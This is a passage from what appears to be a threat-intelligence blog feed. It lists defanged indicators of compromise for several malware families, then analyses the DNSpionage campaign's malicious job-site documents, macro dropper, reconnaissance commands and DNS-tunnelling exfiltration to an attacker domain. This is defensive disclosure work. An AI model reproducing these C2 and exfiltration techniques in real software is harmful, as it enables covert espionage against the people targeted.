width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-pOyPnTVjdj0/XAGPlrlxpEI/AAAAAAAABNM/A8Twfa_nJ9A4Kyt_ZlLTY1WVu7fVsZF1gCLcBGAs/s1600/7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="864" data-original-width="1152" height="480" src="https://1.bp.blogspot.com/-pOyPnTVjdj0/XAGPlrlxpEI/AAAAAAAABNM/A8Twfa_nJ9A4Kyt_ZlLTY1WVu7fVsZF1gCLcBGAs/s640/7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b_malware.png" width="640" /></a></div><br /><h3>Win.Trojan.Emotet-6758832-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>67[.]216[.]131[.]134</li><li>88[.]235[.]54[.]71</li><li>24[.]190[.]11[.]79</li><li>192[.]208[.]165[.]34</li><li>98[.]6[.]145[.]178</li><li>207[.]244[.]67[.]214</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\SysWOW64\4WPGc4HlcDQ.exe</li></ul><b>File Hashes</b><br /><ul><li>3567201c7de66370aa8eb0bd6242b0ce6edf3d4326c2255828470407a2a124b3</li><li>3f2fa56542583680c7feeda31a5e16b85f11d74b710e6cb699ffcf15b6ca753a</li><li>40ef85a4108702a3af09f9047b66585ffa2c73458cf9177a6ca67b4d8f388050</li><li>529a8f391dd994779340aa59118b703256321bb421db138ee0b7db4265599b12</li><li>5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9</li><li>78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843</li><li>7d42a037f8c824724e3525e40f09ae6b3f0eaca4278e4f0b95bb5ca50f008f7b</li><li>864b1ce8feeed53db144afae131da20601bdf2951e198827177d40a233c490bd</li><li>c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6</li><li>c2ffeb181bc57e65011cb68ed33de62ef2ae79b12f320fa8362b096fe9f26430</li><li>d60149eb78e3df622e24afec34b06c7c4c1d26a401ec326ea5eaaa74df873e3b</li><li>e06807d11e7fba844ffe986638234633bfb93ccea283187b9019e0268b7876f4</li><li>f5e1c6d6d9bd26a6d0ae3b8657030dd40138e0371b824013821f48302e3f67f3</li><li>fe7d3a850371b6effe47525e39efbf705c4136e78b35f78228b1f986d30ceced</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-1aKNrVT7WIs/XAGPznUQwsI/AAAAAAAABNc/_C_BnFH_HJMdKrgWm57WqIGLrsOWJjsJACLcBGAs/s1600/c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-1aKNrVT7WIs/XAGPznUQwsI/AAAAAAAABNc/_C_BnFH_HJMdKrgWm57WqIGLrsOWJjsJACLcBGAs/s320/c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6_amp.png" width="320" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-vdpj_i_k3oM/XAGP_LnEIXI/AAAAAAAABNk/jSks-5njJgIxZrbu_2F3GJxcdhly9QVKgCLcBGAs/s1600/5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="962" height="334" src="https://4.bp.blogspot.com/-vdpj_i_k3oM/XAGP_LnEIXI/AAAAAAAABNk/jSks-5njJgIxZrbu_2F3GJxcdhly9QVKgCLcBGAs/s640/5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9_tg.png" width="640" /></a></div><br /><h3>Doc.Malware.Valyria-6757519-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>mnesenesse[.]com</li><li>ostrolista[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\qrldddmq.hyb.psm1</li><li>%LocalAppData%\Temp\swfrthjc.vr1.ps1</li></ul><b>File Hashes</b><br /><ul><li>0734985f67598ec0a0caf9ca31edd54bc93c5072ab0facc09f3d5164c8930afe</li><li>0ed8f1b95565876de24b49ab281f37d05d68130edc574ddd66300c5d5c9ad468</li><li>10aab8954d92baa70b29b5d9c13e0bc5f60d21bb34a00c45e963251516441aff</li><li>13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a</li><li>15edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234</li><li>173ee1fdd02789e581caa6858422f4afcf3cebcf4791e4e52c8ffda11ef726e4</li><li>1e1c3a6252578c94258f738d40ca36547631be604ad645e2c33a56cd26eab04b</li><li>2aa5876411a940b91e5091fffc10774063e93d9007bc5b75703747f1ff6737d9</li><li>35b3927d155688d396614850d95358c1d5b19e1d3487598788ffa1b881ecd156</li><li>4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0</li><li>500fe0e5847b6677fa8b91073d3c0fca1d80fef35cafd57b95634abab8973d42</li><li>52577b1c77ef1a8e21c3681d4610bf47fec5fbae0f751f3396dc349d23186de8</li><li>52fb2178d177421a16086155829b67154ddfc589ddc71a99b14f922741586479</li><li>54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee</li><li>5ac2183dc29d6cea617b06c5787019409662898e259f6b1c0c7465c69054bb26</li><li>608c215893b99203b2d355253d42b14fe0bae98b22a891cfa2950c79d8b4dfe1</li><li>61da1d5f5a0e508f1b79fee2a8ed00b37970f5c967cdfbf4a7933163752d777a</li><li>6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f</li><li>6e005fab674754f7a84fa80b873d02d8c321cfdfa7dbb7661d9d03fbd5c943d0</li><li>6f9b7938e71ce992206f8a8c065159e36dfb26a5c146844a14c8689c68b46985</li><li>7665239ea5a4928f88cc39051fde78ad6ef2660a248bb57550fc3adb69d414bc</li><li>782071bd82d2a75149d55cf3a036add1a82349c42a77cecf17f5c74c3d535c04</li><li>8aeddfcdce551eede421e527a4f1183b6378ca7bfbea07e0f4810d8c60357cec</li><li>8eb3b092f7105734380156ddf60db8ab71d23270c55f7d9e98499bb11399b47a</li><li>8fb33dc484fcfc5440e175cce2fe3efe3b70cfd1e61f8dbce5a846e7271a8469</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-KX19-P0orPg/XAGQNvnNGzI/AAAAAAAABNo/RxtoGJUud6wJsU31kG3zR2bgR5TGY3ocwCLcBGAs/s1600/4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-KX19-P0orPg/XAGQNvnNGzI/AAAAAAAABNo/RxtoGJUud6wJsU31kG3zR2bgR5TGY3ocwCLcBGAs/s400/4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-HLR_udS_PDE/XAGQWo0PcMI/AAAAAAAABNw/QNHehKcbgdAwts9H854YUgQzh--NbaOdACLcBGAs/s1600/13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-HLR_udS_PDE/XAGQWo0PcMI/AAAAAAAABNw/QNHehKcbgdAwts9H854YUgQzh--NbaOdACLcBGAs/s640/13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-m7g-LcjEeDg/XAGQd9tZczI/AAAAAAAABN0/RGc-7yYmlogNyaZsKQzuSqJs3E77r-9PgCLcBGAs/s1600/6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://3.bp.blogspot.com/-m7g-LcjEeDg/XAGQd9tZczI/AAAAAAAABN0/RGc-7yYmlogNyaZsKQzuSqJs3E77r-9PgCLcBGAs/s640/6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f_umbrella.png" width="640" /></a></div><b><br /></b><b><br /></b><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-yZJ2VdnpnY8/XAGQisQKhaI/AAAAAAAABN8/CwYQBmhbj-0x6NK8ILBpUYO7zst-CC1agCLcBGAs/s1600/54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-yZJ2VdnpnY8/XAGQisQKhaI/AAAAAAAABN8/CwYQBmhbj-0x6NK8ILBpUYO7zst-CC1agCLcBGAs/s640/54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee_malware.png" width="640" /></a></div><br /><h3>Win.Virus.Triusor-6757540-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\RegAsm.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\ilasm.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\jsc.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\ngen.exe</li><li>%WinDir%\Microsoft.NET\Framework\v1.1.4322\vbc.exe</li></ul><b>File Hashes</b><br /><ul><li>0bc3007209f850ac764646065dcc8fdd85c46425dc98d72631e51045ba36069c</li><li>14bc92fb1cb50fc6ffd2f34b701e57603fb99b96130c7e5b77187c2c3684a4db</li><li>249ac287cada8bab59c445a286a8edb645f58035681c788687979c17d7eb766f</li><li>3822de7241c17afa298071ab05ea0552456c7b9e78f2655b3471554f972520cf</li><li>3adbbb8794d8244bbc905ad9b7d54046e494374f1856447fd174869911f8ebd2</li><li>68d400f36ef0ac8869499a0185fc52a7d22add5a137fcdd9d73b7e47d8514049</li><li>6a897eacea0f1a6773d19c6b1dbd101db860e3f8df547d97392c98a6aef0cce5</li><li>6b34a29fcdf2ad7a74859ba38c3a622971c1bbdb6a1268d5c766fac441b9970d</li><li>8cee25864d734f6624754ba68d47d0d6573ce6d4ca55c2cf3025a1435bf84685</li><li>8f4bd4d1d9d337cfd8ffd0afe80213ae90063d274aad64b04aa8558b837218e6</li><li>9df2784ba1fd594ab90357d799b26e0fa3abca65a5744ce3d62993d74b0f7e0f</li><li>9e76c9877cb6820ff88937ee158cd59cbe16b9eb26526f0f1ec39d09601dca05</li><li>a3168cb7b3fd30eed135ba086e9e96984f56fd52317d185f3e988176440a5a25</li><li>db6317729cabcb31a4be51a3cc281bffc5dd38a8164861c4d7fe7a0be386f892</li><li>dc8c46a57c38955f4b6356d29662beeb0f88eeca50a94191df8892efab3bfc2e</li><li>ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-wCXBexgwz28/Wz-6akBh85I/AAAAAAAAAbg/AeWyAjQMrJg7K6XFDEUtI5Ctk0_1u7ezACLcBGAs/s320/amp-email-threatgrid-only.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-P3adklAetxk/XAGQtnQA8JI/AAAAAAAABOI/ZoIZYjsyycQ7aJ-Jgjl8Q4thN8MIy29ywCLcBGAs/s1600/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-P3adklAetxk/XAGQtnQA8JI/AAAAAAAABOI/ZoIZYjsyycQ7aJ-Jgjl8Q4thN8MIy29ywCLcBGAs/s400/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-Pdzr3cMwDkA/XAGQx6t5J-I/AAAAAAAABOM/ZzYZhyBahHkJ5ng1fc7iYkeWzg1fn5SBACLcBGAs/s1600/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="962" height="320" src="https://2.bp.blogspot.com/-Pdzr3cMwDkA/XAGQx6t5J-I/AAAAAAAABOM/ZzYZhyBahHkJ5ng1fc7iYkeWzg1fn5SBACLcBGAs/s640/ec0b82ac2d4ca03a4c20ebeaa2fe5a0fc33f4e2270f8bf08063400c06a005f59_tg.png" width="640" /></a></div><br /><br /><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/671plxFAmfc" height="1" width="1" alt=""/>2018-12-13T14:20:42.472-05:000https://blog.talosintelligence.com/2018/11/threat-roundup-1123-1130.htmlDNSpionage Campaign Targets Middle Easthttp://feedproxy.google.com/~r/feedburner/Talos/~3/CD6ENIVNHU4/dnspionage-campaign-targets-middle-east.htmlAPTDNSDNS redirectionDNSpionageLebanonMiddle EastRATUAEnoreply@blogger.com (Paul Rascagneres)Tue, 27 Nov 2018 07:02:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-8790671249786498861<div dir="ltr" style="text-align: left;" trbidi="on"><i>This blog post was authored by <a href="https://twitter.com/securitybeard">Warren Mercer</a> and <a href="https://twitter.com/r00tbsd">Paul Rascagneres</a>.</i><br /><i><br /></i><i>Update 2018-11-27 15:30:00 EDT: A Russian-language document has been removed. Subsequent analysis leads us to believe it is unrelated to this investigation.</i><br /><br /><h2 id="h.f50nw968t1yl">Executive Summary</h2><br />Cisco Talos recently discovered a new campaign targeting Lebanon and the United Arab Emirates (UAE) affecting .gov domains, as well as a private Lebanese airline company. Based on our research, it's clear that this adversary spent time understanding the victims' network infrastructure in order to remain under the radar and act as inconspicuous as possible during their attacks.<br /><br />Based on this actor's infrastructure and TTPs, we haven't been able to connect them with any other campaign or actor that's been observed recently. This particular campaign utilizes two fake, malicious websites containing job postings that are used to compromise targets via malicious Microsoft Office documents with embedded macros. The malware utilized by this actor, which we are calling "DNSpionage," supports HTTP and DNS communication with the attackers.<br /><br />In a separate campaign, the attackers used the same IP to redirect the DNS of legitimate .gov and private company domains. During each DNS compromise, the actor carefully generated Let's Encrypt certificates for the redirected domains. These certificates provide X.509 certificates for TLS free of charge to the user. We don't know at this time if the DNS redirections were successful.<br /><br />In this post, we will break down the attackers' methods and show how they used malicious documents to attempt to trick users into opening malicious websites that are disguised as "help wanted" sites for job seekers. Additionally, we will describe the malicious DNS redirection and the timeline of the events.<br /><br /><br /><a name='more'></a><br /><br /><h2 id="h.bck4uuvi3s9a">Infection vectors</h2><h3 id="h.sb7i209nv50n">Fake job websites</h3><br />The attackers' first attempt to compromise the user involved two malicious websites that mimicked legitimate sites that host job listings:<br /><br /><ul><li>hr-wipro[.]com (with a redirection to wipro.com)</li><li>hr-suncor[.]com (with a redirection to suncor.com)</li></ul><br />These sites hosted a malicious Microsoft Office document: hxxp://hr-suncor[.]com/Suncor_employment_form[.]doc.<br /><br />The document is a copy of a legitimate file available on the website for Suncor Energy, a Canadian sustainable energy company, and contains a malicious macro.<br /><br />At this time, we don't know how the target received these links. The attackers most likely sent the malicious document via email as part of a spear-phishing campaign, but it also could have circulated via social media platforms, such as LinkedIn, in an attempt to legitimize the opportunity for a new job.<br /><br /><h3 id="h.ydshmkxxgfvn">Malicious Office document</h3><br />Upon opening the first Office document, the user receives a message that says "Content Mode Available:"<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-5tYMN-kz4Rs/W_0-Xk9LRpI/AAAAAAAAAlA/qoYntm4inrAAs619zf8aLtm-lVUg5DzFQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="978" data-original-width="1422" height="440" src="https://3.bp.blogspot.com/-5tYMN-kz4Rs/W_0-Xk9LRpI/AAAAAAAAAlA/qoYntm4inrAAs619zf8aLtm-lVUg5DzFQCLcBGAs/s640/image3.png" width="640" /></a></div><h3 id="h.o18wrhokj3qi">Macros used</h3><br />The macros of the analysed samples can be divided into two steps:<br /><ol><li>When the document is opened, the macro will decode a PE file encoded with base64 and will drop it in %UserProfile%\.oracleServices\svshost_serv.doc</li><li>When the document is closed, the macro will rename the file "svshost_serv.doc" to "svshost_serv.exe." Then, the macro creates a scheduled task named "chromium updater v 37.5.0" in order to execute the binary. The scheduled task is executed immediately and repeatedly every minute.</li></ol>The purpose of these two steps is to avoid sandbox detection.<br /><br />The payload is executed when Microsoft Office is closed, meaning it requires human interaction to deploy it. The macros, while available through analysis, are also password-protected in Microsoft Word to stop the victim from exploring the macro code via Microsoft Office.<br /><br />Additionally, the macro uses classical string obfuscation in order to avoid strings detection:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-FHq5hpKX-Qw/W_0-tS2uBkI/AAAAAAAAAlM/JHdctOeFHJUy7P19jrRnrroYzsFnrTT-gCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="210" data-original-width="885" height="150" src="https://3.bp.blogspot.com/-FHq5hpKX-Qw/W_0-tS2uBkI/AAAAAAAAAlM/JHdctOeFHJUy7P19jrRnrroYzsFnrTT-gCLcBGAs/s640/image6.png" width="640" /></a></div><br />The "schedule.service" string is created by concatenation. The final payload is a remote administration tool that we named "DNSpionage."<br /><br /><h2 id="h.w4a1sqa5d0ex">DNSpionage malware</h2><br /><h3 id="h.nvook3g0pv4m">Malware analysis</h3><br />The malware dropped by the malicious document is an undocumented remote administration tool. We are naming it DNSpionage due to the fact that it supports DNS tunneling as a covert channel to communicate with the attackers' infrastructure.<br /><br />DNSpionage creates its own data in the running directory:<br /><pre>%UserProfile%\.oracleServices/<br />%UserProfile%\.oracleServices/Apps/<br />%UserProfile%\.oracleServices/Configure.txt<br />%UserProfile%\.oracleServices/Downloads/<br />%UserProfile%\.oracleServices/log.txt<br />%UserProfile%\.oracleServices/svshost_serv.exe<br />%UserProfile%\.oracleServices/Uploads/<br /></pre>The Downloads directory is used by the attackers to store additional scripts and tools downloaded from the C2 server.<br /><br />The Uploads directory is used by the attacker to temporarily store files before exfiltrating them to the C2 server.<br /><br />The log.txt file contains logs in plain text.<br /><br />All the executed commands can be logged in this file, it also contains the result of the commands.<br /><br />The last file is Configure.txt. As expected, this file contains the malware configuration. The attackers can specify a custom command and control (C2) server URL, a URI and a domain that serves as a DNS covert channel. Additionally, the attackers can specify a custom base64 alphabet for obfuscation. We discovered that the attackers used a custom alphabet for each target.<br /><br />All the data is transferred in JSON. That's why a large part of the code of the malware is the JSON library.<br /><br /><h3 id="h.gno7m7t3wc6v">Communication Channels</h3><br />The malware uses HTTP and DNS in order to communicate with the C2 server.<br /><br /><h4 id="h.f5i6wa64yjl4">HTTP mode</h4><br />A DNS request (to 0ffice36o[.]com) is performed with random data encoded with base64. This request registers the infected system and received the IP of an HTTP server (185.20.184.138 during the investigation). An example of a DNS request:<br /><pre>yyqagfzvwmd4j5ddiscdgjbe6uccgjaq[.]0ffice36o[.]com<br /></pre>The malware is able to craft DNS requests used to provide the attacker with further information. Here is an example of request:<br /><pre>oGjBGFDHSMRQGQ4HY000[.]0ffice36o[.]com<br /></pre>In this context, the first four characters are randomly generated by the malware using rand(). The rest of the domain is then encoded in base32, once decoded the value is 1Fy2048. "Fy" is the target ID and "2048" (0x800) means "Config file not found". The request is performed if the configuration file was not retrieved on the infected machine. This is a message is used to inform the attacker.<br /><br />The malware performs an initial HTTP request to retrieve its configuration at hxxp://IP/Client/Login?id=Fy.<br /><br />This request will be used to create the configuration file, particularly to set the custom base64 dictionary.<br /><br />The second HTTP request is hxxp://IP/index.html?id=XX (where "XX" is the ID for the infected system)<br /><br />The purpose of this request is to retrieve the orders. The site is a fake Wikipedia page:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-hk-m0hXlJw0/W_0-zGxE9FI/AAAAAAAAAlU/OLvyay94AfIFNPK04uaFDtgt-X000qTxgCLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1102" data-original-width="1385" height="508" src="https://1.bp.blogspot.com/-hk-m0hXlJw0/W_0-zGxE9FI/AAAAAAAAAlU/OLvyay94AfIFNPK04uaFDtgt-X000qTxgCLcBGAs/s640/image1.png" width="640" /></a></div><br />The commands are included in the source code of the page:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-lb9IUZ5_i3U/W_0-3nq6EAI/AAAAAAAAAlY/acYgjzX_08QC85r00SN4jVvS2menwsvUQCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="344" data-original-width="1600" height="136" src="https://2.bp.blogspot.com/-lb9IUZ5_i3U/W_0-3nq6EAI/AAAAAAAAAlY/acYgjzX_08QC85r00SN4jVvS2menwsvUQCLcBGAs/s640/image5.png" width="640" /></a></div><br />In this example, the commands are encoded with a standard base64 algorithm because we did not receive a custom alphabet. Here is another example with a custom alphabet in the configuration file:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-vJnuTC3ej3k/W_0-7bj6O-I/AAAAAAAAAlc/TFQ-ypr-FXwvxqdQ8vr3UXN9Gb8O-OdGQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="369" data-original-width="1600" height="146" src="https://3.bp.blogspot.com/-vJnuTC3ej3k/W_0-7bj6O-I/AAAAAAAAAlc/TFQ-ypr-FXwvxqdQ8vr3UXN9Gb8O-OdGQCLcBGAs/s640/image7.png" width="640" /></a></div><br />Here are the three commands automatically sent to the compromised system:<br /><br /><ul><li>{"c": "echo %username%", "i": "-4000", "t": -1, "k": 0}</li><li>{"c": "hostname", "i": "-5000", "t": -1, "k": 0}</li><li>{"c": "systeminfo | findstr /B /C:\"Domain\"", "i": "-6000", "t": -1, "k": 0}</li></ul><br />The malware generates the following snippet of code after executing those commands:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/--Egf_wHM3Bk/W_0_ANlKCJI/AAAAAAAAAlk/ZqrP_jXp5dEvSF39Q68h3qvcforOWz87gCLcBGAs/s1600/image8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="573" data-original-width="1600" height="228" src="https://2.bp.blogspot.com/--Egf_wHM3Bk/W_0_ANlKCJI/AAAAAAAAAlk/ZqrP_jXp5dEvSF39Q68h3qvcforOWz87gCLcBGAs/s640/image8.png" width="640" /></a></div><br />The attackers ask for the username and hostname to retrieve the infected user's domains. The first step is clearly a reconnaissance phase. The data is eventually sent to hxxp://IP/Client/Upload.<br /><br />Finally, CreateProcess() executes the commands, and the output is redirected to a pipe to the malware created with CreatePipe().<br /><br /><h4 id="h.vasiujhglmyl">DNS mode</h4><br />The malware also supports a DNS-only mode. In this mode, the orders and answers are handled via DNS. This option is dictated within the configure.txt file on the infected machine. Using DNS can sometimes be easier to allow for information to be sent back to the attacker as it will generally avoid proxies or web filtering in place by leveraging the DNS protocol.<br /><br />First, the malware initiates a DNS query to ask for orders, for example:<br /><pre>RoyNGBDVIAA0[.]0ffice36o[.]com <br /></pre>The first four characters must be ignored, as mentioned earlier in the article this is random generated characters, and the relevant data is GBDVIAA0. The decoded value (base32) is "0GT\x00". GT is the target ID and \x00 the request number. The C2 server replies with an answer to the DNS request, this will be an IP address, whilst not always a valid IP it is perfectly acceptable for the DNS protocol, for example 0.1.0.3. We believe the first value (0x0001) is the command ID for the next DNS request and 0x0003 is the size of the command.<br /><br />Secondly, the malware performs a DNS query with the command ID:<br /><pre>t0qIGBDVIAI0[.]0ffice36o[.]com (GBDVIAI0 =&gt; "0GT\x01")<br /></pre>The C2 server will return a new IP: 100.105.114.0. If we convert the value in ASCII we have "dir\x00", the command to be execute.<br /><br />Finally, the result of the executed command will be sent by multiple DNS request:<br /><pre>gLtAGJDVIAJAKZXWY000.0ffice36o[.]com -&gt; GJDVIAJAKZXWY000 -&gt; "2GT\x01 Vol"<br />TwGHGJDVIATVNVSSA000.0ffice36o[.]com -&gt; GJDVIATVNVSSA000 -&gt; "2GT\x02ume"<br />1QMUGJDVIA3JNYQGI000.0ffice36o[.]com -&gt; GJDVIA3JNYQGI000 -&gt; "2GT\x03in d"<br />iucCGJDVIBDSNF3GK000.0ffice36o[.]com -&gt; GJDVIBDSNF3GK000 -&gt; "2GT\x04rive"<br />viLxGJDVIBJAIMQGQ000.0ffice36o[.]com -&gt; GJDVIBJAIMQGQ000 -&gt; "2GT\x05 C h"<br />[...]<br /></pre><h2 id="h.fw0ryjuar49t">Victimology</h2>Thanks to the DNS exfiltration and Cisco Umbrella, we are able to identify the origin of some of the victims and the period of activity in October and November. Here is the graph for 0ffice36o[.]com, the DNS we mentioned above:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-mVwc-SLms4k/W_0_RmZ9EQI/AAAAAAAAAl0/5qJgmGT-ikUANqulMLUkb3mTbf7F7i6_QCLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="253" data-original-width="1600" height="100" src="https://4.bp.blogspot.com/-mVwc-SLms4k/W_0_RmZ9EQI/AAAAAAAAAl0/5qJgmGT-ikUANqulMLUkb3mTbf7F7i6_QCLcBGAs/s640/image2.png" width="640" /></a></div><br />The queries were performed from Lebanon and UAE. This information is confirmed by the DNS redirection described in the next section.<br /><br /><h2 id="h.ffkyygju1anl">DNS redirection</h2><br /><h3 id="h.3sqcfrk4c11o">Introduction</h3><br />Talos discovered three IPs linked to the DNSpionage domain:<br /><br /><ul><li>185.20.184.138</li><li>185.161.211.72</li><li>185.20.187.8</li></ul><br />The three IPs are hosted by 